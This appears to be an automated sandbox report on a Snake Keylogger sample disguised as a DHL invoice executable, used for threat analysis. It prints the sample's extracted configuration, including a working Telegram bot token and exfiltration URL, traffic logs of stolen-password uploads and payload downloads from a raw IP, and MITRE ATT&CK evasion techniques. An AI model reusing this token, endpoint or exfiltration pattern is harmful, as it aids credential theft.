Instruction Fuzzy Hash: FAE0D835D1436A5FCF0197709C115EEBF30ED96354F05429BC8A577042EB60154BC772

Function 009CD4C4 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64ed455cc4992558c2f98c0dd440b9c6e98616a9fba61c307b9750dfbb9240e8
Instruction ID: 99a0757193bc76be27625d0ab86186c1961a3de0808d86fefa5e6819561e95bd
Opcode Fuzzy Hash: 64ed455cc4992558c2f98c0dd440b9c6e98616a9fba61c307b9750dfbb9240e8
Instruction Fuzzy Hash: 82E0D892C0A140CBD3054BA658121B5BF70D8E338174464ABD145CB5B5D668D715D716

Function 05DCF130 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0de849376f77bce4080fcf50fc7a804aa041cf173e57343af7b02f247f645f6
Instruction ID: 7198fcd28b60a886fce0d47acd2078bde8f0d518bb5e3134e6d7fcfe886bf8bf
Opcode Fuzzy Hash: c0de849376f77bce4080fcf50fc7a804aa041cf173e57343af7b02f247f645f6
Instruction Fuzzy Hash: 03E0ED74E05209EFCB44DFA9D54169DBFF5EB89300F1091EAD818A3354E7745A41CF41

Function 05DCF0D8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a53a0bec9f0d837e3004cb4380a457eb9540c073ba7e8a2d310570fb5e8dfe0
Instruction ID: 8433ea60363a41475287aa9cbce25f3d525b7366634cda9d1dfdcf6d025d869f
Opcode Fuzzy Hash: 1a53a0bec9f0d837e3004cb4380a457eb9540c073ba7e8a2d310570fb5e8dfe0
Instruction Fuzzy Hash: 7FE0C974E04209AFCB44DFA9E44169DBFF5AB49300F1091AAD819A3354E7745A41CF41

Function 05DCF080 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2943835975.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5dc0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee48cdf9d785690ea017cc78cba0efbbe23eb4a724659b84cd61bd9c6999d5e1
Instruction ID: 3fbda6e3a65327193defbccd187689eb4d86ae5a62b3321f05eb1ee8045d36c0
Opcode Fuzzy Hash: ee48cdf9d785690ea017cc78cba0efbbe23eb4a724659b84cd61bd9c6999d5e1
Instruction Fuzzy Hash: 6CE0C974E04209EBCB44DFA9D44169DBFB9AB48300F10D1AAD818A3354E7705A419B81

Function 009C2020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa3de38b1224138ba9bdace1efe3e248c94c61bf9aa51013f87d5e1cff6631f9
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: fa3de38b1224138ba9bdace1efe3e248c94c61bf9aa51013f87d5e1cff6631f9
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 009C8270 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: d7b893e544f036bd64c31fd536ec6759271af6a4bbd01a070d35b22d0bd132d0
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 3DC01273A0C5282AA628108E7C48FA7AA8CE2C1BB4A25013BF52C832409842AC8111E6

Function 009CA71D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bfcf906c4f904bc434e7047bfeae721ddcfc490f78e828a3a67411f6f17df65
Instruction ID: 4738868d471e81199ecb938570203741ef8aeef3117366bdaf6f7d0713143b3f
Opcode Fuzzy Hash: 0bfcf906c4f904bc434e7047bfeae721ddcfc490f78e828a3a67411f6f17df65
Instruction Fuzzy Hash: E7D0173AB00008DFCF008F88EC808DDB7B6FB9C221B008016E911A3221C631A821DB50

Function 009C5EB0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e903c94c74eed7458372c373555bcb6d3f7506e59484725c8d9ae7be1ed04bb
Instruction ID: d564c95cc4a87c7c492d95dec19003def825a3f6bd0ceaa4076bd5f975d28dcd
Opcode Fuzzy Hash: 8e903c94c74eed7458372c373555bcb6d3f7506e59484725c8d9ae7be1ed04bb
Instruction Fuzzy Hash: FED02B3044C7811FC712F334EDB1448BF31E980204F10C2B9EC024E17BDA75484E8712

Function 009CFBFB Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8591b3d0fdcb9f9dd4a41490ad2122a9763ae04e46081556e750986280a308d4
Instruction ID: e9797b199ffb50ec197a664ed65dd5fd3b880dedc534d0261240a455ea0a1438
Opcode Fuzzy Hash: 8591b3d0fdcb9f9dd4a41490ad2122a9763ae04e46081556e750986280a308d4
Instruction Fuzzy Hash: 3BD06774D4512CCBCB20DF54DA557DCB7B0EF89300F0014E69809B2251D6305E909F12

Function 009C5EC0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 949f4c4808717bbeb5d80653f0b32506d15e9f7127f4118caaaca9679ccef115
Instruction ID: cc399e1a4b3478484bfd77da0327a104ccacc4bd998e1758dafb95679ee91404
Opcode Fuzzy Hash: 949f4c4808717bbeb5d80653f0b32506d15e9f7127f4118caaaca9679ccef115
Instruction Fuzzy Hash: AAC012301547094FC501F775EA55555BB6EF6C0300F508520B4090E27EDF7869894691

Non-executed Functions

Function 009C21E2 Relevance: 5.1, Strings: 4, Instructions: 146COMMON

Download Yara Rule

Strings

Xbq, xrefs: 009C2314
Xbq, xrefs: 009C2248
Xbq, xrefs: 009C22C7
Xbq, xrefs: 009C220E

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 673705f116395dd71d971652ce5b344ecddab2c15c59e2df50964fb7c45bd33d
Instruction ID: ee873f4a8da17bb97ff2745ab0fb7749bd03aa22a012445fcf6ddb365ee7d73f
Opcode Fuzzy Hash: 673705f116395dd71d971652ce5b344ecddab2c15c59e2df50964fb7c45bd33d
Instruction Fuzzy Hash: 7551B830E043198FDF699B68C954B7EBBB6BB88300F1445ADC41AA7255DF348D85CB93

Function 009C60A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 009C60D2
\;^q, xrefs: 009C60DE
\;^q, xrefs: 009C60B6
\;^q, xrefs: 009C60AC

Memory Dump Source

Source File: 00000004.00000002.2939658654.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 627fb76eb969d94f81afdabab5979a39d9a9f4dfdbb3c0c2b37e6da062203133
Instruction ID: 3c99075a92d10a52593129825d5db762d4df81ca4bf4e788dc90500069c1934e
Opcode Fuzzy Hash: 627fb76eb969d94f81afdabab5979a39d9a9f4dfdbb3c0c2b37e6da062203133
Instruction Fuzzy Hash: 5901B131F401149FCB14CE2EC544E2677EEAF88B60325456EE442DB3B0DA32DC418782

Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage?chat_id=6287380231", "Token": "8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8", "Chat_id": "6287380231", "Version": "5.1"}
Source: InstallUtil.exe.1432.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage"}

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21e85383b951Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /STATO/Vskhdvzxu.mp3 HTTP/1.1Host: 160.22.121.182Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.67.152:443

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe	Virustotal: Detection: 26%			Perma Link
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Code function: 4x nop then jmp 05F7E123h	0_2_05F7DDA8
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Code function: 4x nop then jmp 05F7E123h	0_2_05F7DD9B
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Code function: 4x nop then jmp 05F7816Bh	0_2_05F77F38
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Code function: 4x nop then jmp 05F7816Bh	0_2_05F77F28
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Code function: 4x nop then jmp 05F7E123h	0_2_05F7E0CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 009CF206h	4_2_009CF017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 009CFB90h	4_2_009CF017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_009CE538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_009CEB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_009CED4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D91471h	4_2_05D911C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D902F1h	4_2_05D90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9C8F1h	4_2_05D9C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D91A38h	4_2_05D91620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9C499h	4_2_05D9C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9C041h	4_2_05D9BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9F461h	4_2_05D9F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9BBE9h	4_2_05D9B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D91011h	4_2_05D90D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9F009h	4_2_05D9ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D91A38h	4_2_05D91966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9EBB1h	4_2_05D9E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D90BB1h	4_2_05D90900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9B791h	4_2_05D9B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9E759h	4_2_05D9E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D90751h	4_2_05D904A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9E301h	4_2_05D9E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9DEA9h	4_2_05D9DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9DA51h	4_2_05D9D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9D5F9h	4_2_05D9D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9D1A1h	4_2_05D9CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9CD49h	4_2_05D9CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9FD11h	4_2_05D9FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D9F8B9h	4_2_05D9F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05D91A38h	4_2_05D91610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC7C4Dh	4_2_05DC7910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC6049h	4_2_05DC5DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC5BF1h	4_2_05DC5948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC0FF1h	4_2_05DC0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC0B99h	4_2_05DC08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC5799h	4_2_05DC54F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC5341h	4_2_05DC5098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC0741h	4_2_05DC0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC7761h	4_2_05DC74B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC4EE9h	4_2_05DC4C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC02E9h	4_2_05DC0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC7309h	4_2_05DC7060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC6EB1h	4_2_05DC6C08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_05DCF032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC4A91h	4_2_05DC47E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC6A59h	4_2_05DC67B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC4611h	4_2_05DC4368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05DC64CBh	4_2_05DC6220

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182
Source: unknown	TCP traffic detected without corresponding DNS query: 160.22.121.182

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
